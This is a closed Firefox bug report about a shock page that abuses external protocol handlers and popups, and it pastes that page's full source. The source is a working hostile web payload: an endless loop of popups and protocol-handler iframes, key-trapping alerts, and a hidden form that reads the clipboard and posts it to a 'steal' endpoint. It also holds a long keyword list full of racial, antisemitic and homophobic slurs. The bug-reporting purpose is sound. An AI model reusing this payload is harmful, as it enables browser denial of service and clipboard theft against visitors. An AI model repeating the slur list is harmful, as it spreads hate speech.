Closed Bug 424525 Opened 16 years ago Closed 16 years ago

Firefox 3 beta4 vulnerable to infinite popups and other things


(Firefox :: General, defect)

Not set





(Reporter: copong, Unassigned)





User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b4) Gecko/2008031317 Firefox/3.0b4
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b4) Gecko/2008031317 Firefox/3.0b4

 --> Please don't click on the link unless you know what you're doing. <--

When you do, a page will load up with a knob and a background sound "Hey, you're looking at gay porno" or similar; quite amusing though lol

Anyway, this page tries to log you in IRC (didn't work on my computer, I use Linux but it may work in Windows, apparently the IRC protocol wasn't tied to anything) and tries to download some .exe file which will probably do nasty things on windows machines. This happens on an infinite loop, that's it, in my system FF shows a window saying IRC is not recognized, click in OK and it tries to do the same again. Perhaps the full effect would be harvesting passwords off the computer and sending them to some bot on an IRC channel?

Also, when you close the window, a gazillion of popups open, pretty much buggering your system up if you are not quick enough to kill the Firefox process. Clearly the popup blocker should be at least catching this... Closing the window via CTRL+W or just on the "X" button on the tab, or the browser.

The URL is

Main problem is that this link (or redirections to it) are getting posted elsewhere, Slashdot, personal blogs, everywhere, and FF seems powerless against it.

Firefox 3b4, Linux (Kubuntu Hardy), on KDE4.


Reproducible: Always

Steps to Reproduce:
1. Go to
2. Watch as your computer may get hijacked
3. Try to close that window
Actual Results:  
Millions of popups open after that. The site tries to log you on the IRC and load some evil .exe.

Expected Results:  
Firefox should ask first before trying to launch anything really, and anyway those popups after closing a window should've been blocked.
Erm, the back button worked for me on the latest build. Can you produce a simplified version of this?

Linking to offensive material in bugzilla doesn't seem like a good idea.
I've been told that it also resizes and moves windows around just to wind you up lol I've got that disabled on Firefox so I haven't experienced it.
Hi Damian, yes I know that putting that link ain't a good idea, but how am I supposed to show the bug if I don't?

I'm afraid I can't boil down that page to something simpler. This is the code, however:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
<html xmlns="" lang="en" xml:lang="en">
        <title>GNAA Last Measure Live!</title>
        <meta name="keywords" content="bsd digg gay gnaa internet last measure linux nigger slashdot freebsd niger internet providers internet service providers nigga gays niggers openbsd internet access cable internet xandros netbsd gai gay sex gay personals bds gaysex enternet dial up internet cable internet service lunix internets gay black men internet services cheap internet service gay chat rooms internet fax service insmod gey internet radio dial up internet access international internet gay massage inux gay movies gay com gayboy internet business internet businesses homosex internet college internet banking schwul internet gambling neger homosexuales internet poker internet filtering satellite internet connection internet roaming gay cock broadband internet access gay adoption asian gay gay bears gay guys linux on windows internet connection schwule gej maryland internet linux recovery gay sites michigan internet remote internet access making money on the internet gay pornography gay hardcore internet speed up atlanta gay internet game older gay men gay nudist gay shopping gay san francisco houston internet california internet nigga stole my bike gay houston gay marriage gay bear internet auctions internet worldwide linux laptops redhat9 internet billing broadband internet linux drivers linux pc gay amsterdam gay seattle gay bdsm selling on the internet mature gay men internet call gay sex chat internet marketing gay toys internet printing linux help freebsd ports mobile internet linux for windows linux clustering gay chat teen gay porn ny gay alabama gay freebsd 6.0 linux os spain internet clips gay hairy gay men gay leather make money on the internet gay boy gay philadelphia gay community internet via satellite freebsd 6 gay cartoons gay love nigga lyrics niger uranium internet search gay news hate niggers gay georgia oral gay sex linux downloads communication internet niger africa bds suspension gay nude boys linux applications gay pics enternet 300 internet censorship internet information server gay australia redhat linux gay niggers niger forgeries gay phoenix gay orgies internet sites aspergillus niger internet traffic oracle linux gays **** linux support test internet internet messaging gay vivo horny gay the internets niger forgery bds marketing freebsd org sex gay movies internet canada niger yellowcake gay women linux apache the niger river freebsd wireless internet development bodybuilder gay freebsd java can a nigga get a table dance gay latinos deng gai linux penguin realest nigga real nigga roll call linux tutorial japanese gay gays in military freebsd screenshots linux systems linux software freebsd apache joseph wilson niger installing freebsd gay store freebsd update freebsd port freebsd upgrade teen gays install freebsd freebsd cvsup dead niggers cumshot gay ten little niggers gays com freebsd laptop **** your couch nigga broke nigga internet stock trading niger document jews spics wtc jew jewish holidays jewish calendar jewish community center anti semitism single jews jewish names jewish history jewish museum jewish hospital jewish wedding bernanke jewish us jews jewish music jewish federation barnes jewish russian jews jewish jokes libby jewish jewish singles jewish religion barnes jewish hospital long island jewish jewish people jewish news jewish women ben bernanke jewish jewish girls jewish population world without zionism reform judaism jewish dating jewish food jewish film festival jewish bible jewish porn jewish last names bernanke jew daniel libeskind judaism orthodox jew the world without zionism jewish new year jewish studies jewish heritage jewish quotes jewish humor ben bernanke jew jewish sex long island jewish medical center messianic jewish jewish jewelry jewish calendar 2005 jewish world jewish sayings detroit jewish news judaism beliefs baltimore jewish times jewish vocational services the jewish religion zionism jewish pussy jewish leaders jewish stereotypes jewish slang messianic music reconstructionist judaism jewish board jewish christmas jewish services jewish man jewish t shirts jewish dance heritage civilization and the jews jewish games islam judaism jewish quarter jew who jewish library jewish flag jew reggae jewish community centers wtc ny jewish alphabet wondering jew jewish migration republican jewish coalition messianic prophecies jews in america jewish worship jewish ethics messianic secret jewish bread international jew jewish museum berlin manhattan jewish experience boston jewish film jewish values board of jewish education jewish outreach jewish adoption jewish christians jewish weekly jewish blog women in judaism jewish facts semitic jewish college of nursing messianic jewish dress sephardic persecution christian zionism facts about judaism atlanta jewish jewish gift persecution complex russian jewish black jewish jewish history timeline jewish settlements union of reform judaism jewish homeland woodbury jewish center antisemitism naked jewish women jewish cemetaries republican jewish samuel alito jew judaism com hacidic jew south park jew symbols of judaism jewish recipies jewish association jewish speed dating conversion judaism jewish high holidays jewish religon association for jewish studies jewish libraries jewish tits anti semitic jewish converts jewish dna jewish heroes jewish tattoo jewish text ausmus jewish half jewish jewish fashion allied jewish federation jewish birth christianity judaism islam jewish theology jews and christians jewish restaurants fellowship of christians and jews trump jewish jewish boy names jewish time jewish community center louisville jericho jewish center jewish restaurant jewish naming jewish book council jewish midi libeskind jewish reggae artist jewish greetings barnes jewish west ufo wtc jewish wedding rings association of jewish libraries long island jewish health system temple jewish kingsbrook jewish medical jewish intelligence jewish street jewish nudes jewish family jewish cookies jewish nfl players jewish naming ceremony persecution of homosexuals great persecution jewish writing world jewish digest jesus jew jewish diseases jewish baby gifts christianity judaism and islam jewish wisdom reformed jew borat throw the jew anti semitism in europe jewish educators jewish communal service the jewish diaspora academy for jewish religion 9/11 george bush terrorism george w bush george bush action figure george hw bush talking george bush doll terrorist terrorism training terrorists george bush picture bioterrorism war against terrorism war on terrorism george w bush doll ctu terrorist attacks talking george bush tria president george w bush terrorism articles islam terrorism clinton terrorism gw bush information terrorism article on terrorism george bush quotes terrorist groups terrorism article london bombings george bush dolls chemical terrorism george bush news preparing for terrorism george bush jokes george w bush 2004 george w bush biography terrorism in the middle east terrorism coverage north korea terrorism ctu online george w bush picture terrorism law american terrorism george bush speech president george bush george bush impersonator suicide bombings george bush hates black people george bush jr nuclear terrorism george bush intercontinental george w bush pic understanding terrorism palestinian terrorism george bush funny george bush posters the terrorist counter terrorist george bush dont like black people george w bush for president psychology of terrorism us terrorism george bush sucks george bush library george bush international fight against terrorism george w bush speech george w bush sr george walker bush george w bush speeches impeach george bush george w bush born george w bush election picture of george bush madrid bombings terrorist costume bali bombings george bush games hate george bush george w bush jr biography 24 ctu picture of george w bush george bush cartoon george bush drunk anti terrorist george bush stupid islamic terrorists world trade center bombings bioterrorism preparedness george bush presidential library george w bush birthplace george bush lies george w bush approval rating george w bush head funny george w bush terrorist group terrorist media failure george bush touchtone terrorists george bush andy dick terrorist bombing george w bush presidential library **** george bush birthplace of george w bush george bush college george bush cheerleader 911 terrorist george w bush approval george bush lyrics church bombings hotel tria george bush flash madrid train bombings stupid george bush quotes tria restaurant george w bush pics wanted terrorists terrorisme terrorist watch about george bush international terrorist george bush doesn t care george bush born george w bush cartoons biography of george bush terrorist alert george bush wav abortion clinic bombings bombings atomic bombings george w busch tria philadelphia bill o reilly is a terrorist sympathizer emergency response to terrorism bush terrorist kanye west george bush video george bush parody george bush pumpkin pattern george bush pumpkin carving terrorist world trade center 911 terrorists george bush war george bush state of the union president george bush turnpike funny george bush videos terrorist hunter george w bush yale george bush freeway kayne west george bush uss george bush george bush polls september 11 terrorist attacks george w bush cabinet terrorist games pics of george bush george bush joke george bush cia george w bush presidency hotel bombings george bush raped margie schoedinger impeach george w bush terrorist act middle east terrorism terrorist hunting permit ctu edu september 11 terrorist terrorist handbook 50 cent george bush george w bush audio recent bombings terrorist definition george w bush cocaine george bush education palestinian terrorist george w bush soundboard george bush 41 iraqi terrorist will farrell george bush george bush resume george bush comedy touch tone terrorist bali terrorism george w bush iraq george w bush quote terrorist countries terrorists in iraq tria markers kanye west and george bush george bush texas george w bush is a george w bush approval ratings number of terrorist attacks george w bush stupid george bush don t like black people video eta terrorist photos of george bush volkswagen terrorist photos of george w bush iraq terrorists george w bush middle name george w bush accomplishments george bush bloopers">
        <script type="text/javascript">
            function altf4key() { if (event.keyCode == 18 || event.keyCode == 115) alert("Our lawyer has informed us that we need a warning. So, if you are under the age of 18 or find this offensive, please leave immediately"); }
function ctrlkey() { if (event.keyCode == 17) alert("Our lawyer has informed us that we need a warning. So, if you are under the age of 18 or find this offensive, please leave immediately"); }
function delkey() { if (event.keyCode == 46) alert("LAST MEASURE BY PENISBIRD, Rolloffle, and Rucas.\nStarring:\nSpin\nTubgirl\nLemonparty\nBob Goatse\nPenisbird\nPillowfight\nChristmas\nRusty's Wife\nWhat the ****? That guy's ass is showing in his baby's picture!\n\n\nTotal, complete, all-versions, popup blocker bashing-to-pieces by goat-see\nnhey.swf by rkz\nPROPS TO GNAA. LOL HY -- DiKKy (GNAA NORWAY CORRESPONDANT)\nUpdated by sam, Jmax, JacksonBrown, Dessimat0r, timecop, and others.\n"); }

var nom = navigator.appName.toLowerCase();
var agt = navigator.userAgent.toLowerCase();
var is_major = parseInt(navigator.appVersion);
var is_minor = parseFloat(navigator.appVersion);
var is_ie = (agt.indexOf("msie") != -1);
var is_ie4up = (is_ie && (is_major >= 4));
var is_nav = (nom.indexOf('netscape')!=-1);
var is_nav4 = (is_nav && (is_major == 4));
var is_mac = (agt.indexOf("mac")!=-1);
var is_gecko = (agt.indexOf('gecko') != -1); // GECKO REVISION
var is_rev = 0
if (is_gecko) {
        temp = agt.split("rv:")
        is_rev = parseFloat(temp[1])

function procreate() {
        for(i = 0; i < 16; i++) {

function popUp(URL) {
        day = new Date();
        id = day.getTime();
        eval("page" + id + " =, '_blank', 'toolbar=0,scrollbars=0,location=1,statusbar=0,menubar=0,resizable=0,width=640,height=583');");
goatseflash = '<div id="hello" style="z-index: 50; position: fixed; top: 0px; left: 0px; width: 100%; height: 100%;">';
goatseflash += ' <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase=",0,0,0" width="100%" height="100%">';
goatseflash += ' <param name="movie" value="flash/hello.swf" />'
goatseflash += ' <param name="wmode" value="transparent" />';
goatseflash += ' </object>'
goatseflash += '</div>';

function load_goatse() {
    document.body.innerHTML += goatseflash;
    setTimeout("unload_goatse()", 3000); // 3s

function unload_goatse() {
    document.getElementById("hello").style.display = 'none';

var protos = [
                "ed2k://|file|Gayniggers From Outer Space [GNAA Digitally Remastered].avi|134174720|F8AF9D8A7091CD7A7B8968C9EB397C02|/",
function add(str) {
    div = document.getElementById('goatse');
    div.innerHTML = '<iframe style="width: 1; height: 1;" src="' + str + '"></iframe>';

function ruin() {
    document.body.innerHTML += '<div id="goatse">Y HALLO THAR!</div>';
    while (1) {
        for (i = 0; i < protos.length; i++) {
        <link rel="icon" type="image/x-icon" href="favicon.ico" />
        <link rel="shortcut icon" type="image/x-icon" href="favicon.ico" />
        <style type="text/css">
            html {
                height: 100%;
        width: 100%;
                overflow: hidden;
            body {
                height: 100%;
        width: 100%;
                margin: 0;
                padding: 0;
                        <form name="clip" method="post" action="/index.php?steal=1&key=" style="display:none">
                <input type="text" name="content">
                <input type="hidden" name="pwnd" value="1">
                <input type="submit">
            <script type="text/javascript">
            <!-- // without this if statement check, it bombs out with an error
                if (typeof clipboardData != 'undefined') {
                    var content = clipboardData.getData("Text");
                    document.forms["clip"].elements["content"].value = content;
                document.forms["clip"].submit(); // -->

Blimey, having a quick look at the code... even the code itself is offensive as hell o_O
It also seems to get stuff off the clipboard...
Please use the Mozilla Pastebin for posting long stuff like this:
OS: Linux → All
Hardware: PC → All
Version: unspecified → Trunk
This is a dupe of bug 331334 (external protocol handler dos) and bug 61098
Closed: 16 years ago
Resolution: --- → DUPLICATE
You need to log in before you can comment on or make changes to this bug.